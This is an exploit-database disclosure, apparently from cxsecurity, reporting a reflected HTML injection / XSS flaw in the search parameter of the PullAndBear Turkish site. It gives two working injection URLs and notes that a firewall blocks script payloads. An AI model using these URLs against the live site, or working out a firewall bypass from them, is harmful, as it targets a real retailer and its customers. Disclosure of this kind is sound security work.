PullAndBear Reflected XSS Vulnerability

2023.07.26
tr BQX (TR) tr
Risk: Low
Local: Yes
Remote: Yes
CVE: N/A
CWE: N/A

#Exploit Title: PullAndBear Reflected XSS Vulnerability #Date: 24-07-2023 #Exploit Author: BQX ( ./Bertw_QX ) #Vendor Homepage: https://www.pullandbear.com/ #Category: Reflected XSS #Tested On: Windows 10 - Google Chrome https://www.pullandbear.com/tr/erkek-n6228?q=<b>test</b> https://www.pullandbear.com/tr/erkek-n6228?q=<iframe></iframe> The html codes written after the ?q= parameter are executed on the page. Not: Because of waf, codes like alert don't work err: Access Denied You don't have permission to access "https://www.pullandbear.com/tr/erkek-n6228?q=" on this server. Reference #18.7fc11302.1690229077.2415c6fa ********************************************************* #Telegram: @bqxsec #Telegram Channel: t.me/zerotolerance_hack #Instagram: @bqxsec #Mail: bqxsec@gmail.com *********************************************************


Vote for this issue:
77%
23%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top